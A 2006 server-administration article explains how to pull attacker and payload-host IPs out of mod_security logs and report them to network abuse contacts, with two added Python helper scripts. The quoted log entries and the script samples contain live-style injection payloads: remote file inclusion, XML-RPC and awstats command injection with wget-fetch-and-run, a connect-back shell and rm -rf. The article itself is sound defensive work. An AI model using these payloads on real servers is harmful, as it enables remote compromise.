By Peter M. Abraham, Senior Server and Security Administrator at Dynamic Net, Inc.
January 25, 2006
Security, especially on the Internet, where indiscriminate attacks are so prevalent, should be applied in as many practical layers as you can manage, and those layers should be reviewed frequently (often daily).
One of those layers should be tattling: emailing the abuse departments of the networks the attackers come from, as well as of the networks hosting the payload files the attackers use.
As you look through your log files, you may be in the habit of doing what I do, saying “hahah, got ya” when you see an attack blocked by mod_security (http://www.modsecurity.org/) or by other means.
But if you have the discipline to review your log files frequently and thoroughly, you will see the same attacking IP addresses, and the same sites hosting the hackware they use, over and over again.
If you manage multiple servers across geographic and data center boundaries, you will see the same attacker and the same sites hosting the hackware on all of them; yes, they are targeting broader and broader ranges.
It is because attacks keep growing broader (they are not just attacking your server, your cluster, or your data center), and because the security measure that worked today (gotcha) may not work tomorrow, or one second from now, that I strongly recommend tattling.
Tattling is looking up the abuse email address for each offending IP address, meaning the attacker's and that of every IP or site they are trying to fetch their hackware (also known as malware, kits, or payloads) from, and reporting what you saw to the appropriate IP owners.
We need some Web-based help to identify the IP and site owners. It will come from the following Web locations:
http://www.apnic.net/search/index.html - APNIC – look up Asia Pacific-based IP addresses
http://www.arin.net/whois/index.html - ARIN – look up U.S. and Canada-based IP addresses
http://lacnic.net/sp/ - LACNIC – look up Latin America and Caribbean-based IP addresses
http://www.ripe.net/whois/ - RIPE – look up European-based IP addresses
http://www.dnsstuff.com/ - DNS Stuff – look up the DNS A records of a payload site given its domain name.
Now, let’s move on to the log files. In this article we will deal with logwatch (http://www.logwatch.org/) output, and specifically with the entries it reports from mod_security.
mod_security is an Apache module from http://www.modsecurity.org/, and a blessing to everyone who wants to defend against attacks on Apache, including attacks on PHP and CGI applications.
If you are not familiar with mod_security, I highly recommend you visit the site, read the documentation, and start working with this awesome security tool.
This is a real mod_security entry; the only change is that our customer’s IP / domain has been masked:
Request: [your customer's domain or IP without brackets] 209.250.116.251 - - [24/Jan/2006:21:49:21 -0500] "
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&
_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?
&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback
%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 500 545 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)" Q9bnMdGtgsYAAFwvUIk "-"
Let’s identify the attacker and hosted payload IP addresses:
209.250.116.251 – attacker
12.196.192.16 – hosted payload
216.103.82.214 – hosted payload
217.160.242.90 – hosted payload
Now, for each one, use the appropriate IP owner lookup form:
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-209-250-116-192-1 is the end result of putting 209.250.116.251 in http://www.arin.net/whois/index.html
This IP is owned by Meserve, Mumpers & Hughes LLP under DSL.net, Inc.
12.196.192.16 and 216.103.82.214 are also U.S.-based. 217.160.242.90 is European-based.
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-12-196-188-0-1 shows AT&T owns 12.196.192.16
http://ws.arin.net/cgi-bin/whois.pl?queryinput=!%20NET-216-103-80-0-1 shows ADSL BASIC under SBC Internet Services as the owners.
Here’s another mod_security entry where the payloads are referenced by domain name rather than IP address:
Request: [your customer's domain or IP without brackets] 200.28.128.21 - - [23/Jan/2006:10:38:13 -0600] "
GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;
GET%20http://www.albanian.ch/anon/sess3023_%20>%20sess3023_;perl%20sess3023_
;rm%20-rf%20sess3023*? HTTP/1.1" 500 544 "-" "Mozilla/5.0" Q9UGdULYfxoAADbVKDc "-"
Let’s identify the attacker and hosted payload IP addresses:
200.28.128.21 – attacker
www.s0l4r1sr0x.com – hosted payload
www.albanian.ch – hosted payload
You can use the nslookup tool on http://www.dnsstuff.com to find the IP addresses involved.
http://www.dnsstuff.com/tools/lookup.ch?name=www.s0l4r1sr0x.com+&type=A shows that www.s0l4r1sr0x.com resolves to a range of IP addresses from 207.217.96.28 to 207.217.96.45.
http://www.arin.net/whois/index.html will show you that those IP addresses are owned by EarthLink Network, Inc.
http://www.dnsstuff.com/tools/lookup.ch?name=www.albanian.ch&type=A shows the IP address for this domain; per arin.net that IP is owned by ThePlanet.com Internet Services, Inc.
What about entries where the attacker is trying to exploit XML-RPC vulnerabilities? The attacker's IP is in the request line, but the payload request is buried in the POST body:
Request: [your customer's domain or IP without brackets] 212.33.82.163 - -
[24/Jan/2006:18:39:03 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 500 555 "-" "
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Q9a6l9GtgxMAACAbECw "-"
----------------------------------------
POST /drupal/xmlrpc.php HTTP/1.1
Content-Length: 269
Content-Type: text/xml
Host: 209.173.131.20
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match "xmlrpc" at REQUEST_URI
259
<?xml version="1.0"?><methodCall><methodName>test.method</methodName>
<params><param><value><name>',''));echo '_begin_';echo `cd /tmp;
wget 194.102.194.115/scripo;chmod +x scripo;./scripo `;echo '_end_';exit;/
*</name></value></param></params></methodCall>
Let’s identify the attacker and hosted payload IP addresses:
212.33.82.163 – attacker
194.102.194.115 – hosted payload
Both of these IP addresses can be looked up by RIPE’s lookup tool at http://www.ripe.net/whois/
212.33.82.163 is owned by “CITY” in Poland, and 194.102.194.115 by GMB Computers in Romania.
Here's one where the payload IP is harder to find because the attacker used URL hex encoding (%2e for the dots, %2f for the slashes, %3b for the semicolons) to mask the IP address of the hosted payload:
Request: [your customer's domain or IP without brackets] 69.88.135.20 - -
[25/Jan/2006:10:32:11 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%
3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20
%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 500 530 "-" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1;)" Q9eZ@tGtgggAAFR1yMw "-"
Handler: cgi-script
Let’s identify the attacker and hosted payload IP addresses:
69.88.135.20 -- attacker
194.102.194.115 -- hosted payload
By the way, notice that the hosted payload for the awstats attack is the same one used in the XML-RPC attack: GMB Computers in Romania.
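Picking the attacker and payload hosts out of these entries by hand does not scale once you watch more than a handful of servers, so here is the identification step as a script. This is an added example for this article, not the author's or mod_security's own code. It parses records of the kind quoted above (the four entries are reassembled below as constructed samples, with the customer host replaced by the placeholder customer.example), percent-decodes them so the awstats-style hex encoding is undone, and pulls out the attacker IP plus every host named in a URL, in a wget/GET command, or as a bare IP such as the cback callback, while excluding our own server. The list of downloader commands and the dictionary field names are my assumptions, not anything mod_security defines.

```python
"""Extract the attacker IP and the hosts serving 'hackware' from mod_security
'Request:' records like the four quoted above.  Added example for this
article; it is not the author's or mod_security's own code.  A record is the
'Request:' line, optionally followed by the echoed request headers and body."""
import re
from collections import Counter
from urllib.parse import unquote

IPV4 = r"(?<![\w.])(?:\d{1,3}\.){3}\d{1,3}(?![\w.])"
IPV4_RE = re.compile(IPV4)
REQUEST_LINE = re.compile(
    r'^Request: (?P<target>\S+) (?P<attacker>' + IPV4 + r') - -\s*'
    r'\[(?P<when>[^\]]+)\]\s*"(?P<method>[A-Z]+) (?P<uri>.*?) HTTP/\d\.\d"')
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Downloaders seen in the quoted entries (wget, LWP's GET) plus common stand-ins (assumed list).
FETCH_HOST = re.compile(
    r"\b(?:wget|curl|lwp-download|fetch|lynx|GET)\s+(?:https?://)?([A-Za-z0-9.-]+)")
HOST_HEADER = re.compile(r"^Host:\s*(\S+)", re.M | re.I)


def percent_decode(text, rounds=3):
    """Undo URL percent-encoding, repeating for double-encoded payloads.  This is
    what turns the awstats entry's %2e/%2f/%3b back into '.', '/' and ';'."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_valid_host(name):
    """Accept well-formed IPv4 literals and dotted hostnames only."""
    if IPV4_RE.fullmatch(name):
        return all(int(octet) <= 255 for octet in name.split("."))
    return "." in name and not name.startswith(("-", ".")) and not name.endswith(".")


def find_hosts(text):
    """Hosts named in URLs, in fetch commands, or as bare IPv4 literals (the
    callback './cback 217.160.242.90 8081' has neither a scheme nor a wget)."""
    found = [m.group(1) for p in (URL_HOST, FETCH_HOST) for m in p.finditer(text)]
    found += IPV4_RE.findall(text)
    ordered = []
    for host in (h.strip(".").lower() for h in found):
        if is_valid_host(host) and host not in ordered:
            ordered.append(host)
    return ordered


def parse_record(record):
    """One mod_security record -> dict of indicators, or None if it is not one."""
    record = record.strip()
    m = REQUEST_LINE.match(record)
    if not m:
        return None
    decoded = percent_decode(record)
    # Our own server appears as the first token of the Request line and in the
    # echoed Host: header; neither is a payload host.
    ours = {m.group("target").lower()} | {h.lower() for h in HOST_HEADER.findall(decoded)}
    attacker = m.group("attacker")
    return {
        "attacker": attacker,
        "target": m.group("target"),
        "when": m.group("when"),
        "path": m.group("uri").split("?", 1)[0],
        "payload_hosts": [h for h in find_hosts(decoded) if h not in ours and h != attacker],
        "raw": record,
    }


def payload_host_counts(records):
    """How many records each payload host appears in: the same host recurring
    across attacks is exactly what the article says to watch for."""
    counts = Counter()
    for rec in records:
        counts.update(rec["payload_hosts"])
    return counts


# Constructed samples: the four entries quoted in the article reassembled onto
# one line each, with the customer's hostname replaced by 'customer.example'.
SAMPLE_RECORDS = [
    'Request: customer.example 209.250.116.251 - - [24/Jan/2006:21:49:21 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 500 545 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Q9bnMdGtgsYAAFwvUIk "-"',
    'Request: customer.example 200.28.128.21 - - [23/Jan/2006:10:38:13 -0600] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;GET%20http://www.albanian.ch/anon/sess3023_%20>%20sess3023_;perl%20sess3023_;rm%20-rf%20sess3023*? HTTP/1.1" 500 544 "-" "Mozilla/5.0" Q9UGdULYfxoAADbVKDc "-"',
    'Request: customer.example 212.33.82.163 - - [24/Jan/2006:18:39:03 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 500 555 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Q9a6l9GtgxMAACAbECw "-"\n'
    "----------------------------------------\nPOST /drupal/xmlrpc.php HTTP/1.1\nContent-Length: 269\nContent-Type: text/xml\nHost: 209.173.131.20\n"
    "mod_security-message: Access denied with code 500. Pattern match \"xmlrpc\" at REQUEST_URI\n"
    "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 194.102.194.115/scripo;chmod +x scripo;./scripo `;echo '_end_';exit;/*</name></value></param></params></methodCall>",
    'Request: customer.example 69.88.135.20 - - [25/Jan/2006:10:32:11 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 500 530 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" Q9eZ@tGtgggAAFR1yMw "-"\nHandler: cgi-script',
]

if __name__ == "__main__":
    parsed = [r for r in map(parse_record, SAMPLE_RECORDS) if r]
    for rec in parsed:
        print(f'{rec["attacker"]} -> {rec["path"]}: payloads {", ".join(rec["payload_hosts"])}')
    print("seen most often:", payload_host_counts(parsed).most_common(1))
```

Run against the four samples it reports the same attacker and payload hosts the article lists by hand, and the counter shows 194.102.194.115 twice, the overlap the article points out between the XML-RPC and awstats attacks. Decoding the whole record before scanning, rather than only the query string, is what makes the POST-body and hex-encoded cases fall out of the same code path.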
OK, so now you have at least a rough idea of how to identify the attacker and the sites hosting the payloads the attacker is trying to download to the server to help compromise it. What about tattling?
When you look up IP ownership using http://www.apnic.net/search/index.html, http://www.arin.net/whois/index.html, http://lacnic.net/sp/ or http://www.ripe.net/whois/, the output includes the abuse email address.
Most of the time this email address is abuse@[mail server machine name or domain name]; sometimes, as in the case of GMB Computers mentioned above, you will see only one email address, and it is that of a person rather than a department.
In either case, look first for an abuse email address, and only then at other email addresses.
Now, let’s move on to the composition of the email to the abuse person or department.
You will want to write short, clear, and concise emails that give a solid picture of the problem without overwhelming the recipient.
You are not the only one emailing the abuse person or department: they often handle spam complaints and other kinds of complaints as well. Some companies are short-staffed, so the person handling this job may be overworked and underpaid.
You want to give them solid reasons for dealing with your email and for acting on it quickly.
Therefore, be sure that your email rests on the following foundation points:
Using the right foundation, your email should be brief.
I recommend one to no more than three sample log entries, with one or two blank lines between each long sample.
Do not expect them to have read this article or to do their homework; so, be sure to state separately the IP address or domain name they are hosting.
Be sure to ask them to take appropriate action without demanding the specific action you want them to take. Sure, we want the hackware deleted, but that is their decision to make.
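Here is what the contact-selection rule (abuse address first, other addresses second) and the foundation points for the email look like when scripted. This is an added example for this article, not the author's own tooling or any registry's code. The whois answers it reads are constructed in the ARIN and RIPE field styles and are not real lookups of the addresses named above; the sightings are abbreviated, the signature block is a placeholder, and the whois URL is built from the RIPE query form used in the sample email below.

```python
"""Pick the abuse contact out of a whois answer and compose the short report
the article recommends.  Added example for this article; it is not the
author's tooling or any registry's code.  The whois answers are constructed
in the ARIN and RIPE field styles (not real lookups of the addresses named
in the article), and the signature and sightings are placeholders."""
import re
from collections import defaultdict

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

# Constructed answers.  ARIN labels the mailbox OrgAbuseEmail; the RIPE-style
# one only mentions abuse@ in a remark; the third, like the GMB Computers
# record in the text, lists a single person and no abuse role at all.
WHOIS_ARIN = """OrgName:        Example DSL Provider
NetRange:       198.51.100.0 - 198.51.100.255
OrgAbuseEmail:  abuse@dsl.example.net
OrgTechEmail:   noc@dsl.example.net
"""
WHOIS_RIPE = """inetnum:        203.0.113.0 - 203.0.113.255
netname:        EXAMPLE-HOSTING
remarks:        send complaints to abuse@hosting.example
e-mail:         hostmaster@hosting.example
"""
WHOIS_PERSON = """inetnum:        192.0.2.0 - 192.0.2.255
person:         Jane Doe
e-mail:         jane@isp.example
"""


def pick_abuse_contact(whois_text):
    """Return (address, how_chosen) or None.  Preference order follows the
    article: a field labelled for abuse, then any abuse@ mailbox mentioned
    anywhere, then whatever other address the record lists."""
    labelled, abuse_at, others = [], [], []
    for line in whois_text.splitlines():
        field, _, value = line.partition(":")
        for addr in (a.lower() for a in EMAIL.findall(value)):
            if "abuse" in field.lower():
                labelled.append(addr)
            elif addr.startswith("abuse@"):
                abuse_at.append(addr)
            else:
                others.append(addr)
    for bucket, how in ((labelled, "abuse field"), (abuse_at, "abuse@ mailbox"), (others, "other contact")):
        if bucket:
            return bucket[0], how
    return None


def group_sightings(records):
    """Map each payload host to the raw entries it was seen in, so one report
    goes to that host's owner however many servers saw it."""
    by_host = defaultdict(list)
    for rec in records:
        for host in rec["payload_hosts"]:
            by_host[host].append(rec["raw"])
    return by_host


def build_abuse_report(payload_host, whois_url, sightings, signature, max_samples=3):
    """Short and concrete: the host stated on its own line, one to three sample
    entries separated by a blank line, and a request for 'appropriate action'
    rather than a demand for a specific one."""
    samples = [s.strip() for s in sightings[:max_samples]]
    heading = ("Sample log entry:" if len(samples) == 1
               else f"Sample log entries ({len(samples)} of {len(sightings)} seen):")
    parts = [
        "Greetings:", "",
        f"RE: {whois_url}",
        f"IP address or host: {payload_host}", "",
        heading, "",
        "\n\n".join(samples), "",
        f"Please note the requests for a hackware file on {payload_host}.",
        "Please take appropriate action.", "",
        "Thank you.", "",
        signature,
    ]
    return "\n".join(parts)


# Constructed, abbreviated records in the shape a log parser would hand over.
SIGHTINGS = [
    {"payload_hosts": ["194.102.194.115"],
     "raw": 'Request: customer.example 212.33.82.163 - - [24/Jan/2006:18:39:03 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 500 555 (body: wget 194.102.194.115/scripo)'},
    {"payload_hosts": ["194.102.194.115"],
     "raw": 'Request: customer.example 69.88.135.20 - - [25/Jan/2006:10:32:11 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz HTTP/1.1" 500 530'},
]
SIGNATURE = "Jane Admin, Support Department\nExample Hosting LLC\nVoice: +1-555-0100"  # placeholder
RIPE_QUERY = "http://www.ripe.net/whois?form_type=simple&full_query_string=&searchtext="

if __name__ == "__main__":
    contact = pick_abuse_contact(WHOIS_PERSON)
    for host, entries in group_sightings(SIGHTINGS).items():
        print(f"To: {contact[0]}  (chosen via {contact[1]})\n")
        print(build_abuse_report(host, RIPE_QUERY + host, entries, SIGNATURE))
```

Capping the samples at three while still stating how many were seen gives the recipient the scale of the problem without the wall of log lines, and keeping the closing line at "Please take appropriate action" leaves the decision about the file with them, which is the tone the article asks for.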
Here’s an example of an email we sent recently to abuse@schlund.com
=== START OF EMAIL TO ABUSE
Greetings:
RE: http://www.ripe.net/whois?form_type=simple&full_query_string=&searchtext=217.160.242.90&do_search=Search
IP Address: 217.160.242.90
Sample log entry:
Request: [site we host – our customer] 209.250.116.251 - - [24/Jan/2006:21:49:21 -0500] "
GET /index2.php?option=com_content&do_pdf=1&id=1index2.php
?_REQUEST[option]=com_content&_REQUEST[Itemid]=1
&GLOBALS=&mosConfig_absolute_path=http://12.196.192.16/cmd.gif?
&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback
;./cback%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 500 545
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Q9bnMdGtgsYAAFwvUIk "-"
Please note the 217.160.242.90%208081 request for a hackware file.
Please take appropriate action.
Thank you.
________________________________________________
Peter M. Abraham, Support and Customer Care Department
Dynamic Net, Inc.
13 Cowpath
Denver PA 17517
Voice: 1-717-484-1062
________________________________________________
=== END OF EMAIL TO ABUSE
Now, go tattle on some attackers.
Thank you.
About Dynamic Net, Inc.
Dynamic Net, Inc. is a privately held, Pennsylvania Corporation, focusing on helping companies do business on the Internet. Part of Dynamic Net's focus includes helping Parallels H-Sphere hosting providers secure their hosting environment. This security help comes in many forms including the Positive Software endorsed and published Parallels H-Sphere security how-to documents, heavy volunteer participation in the Parallels H-Sphere community forum, and contract work covering Parallels H-Sphere server administration and security services.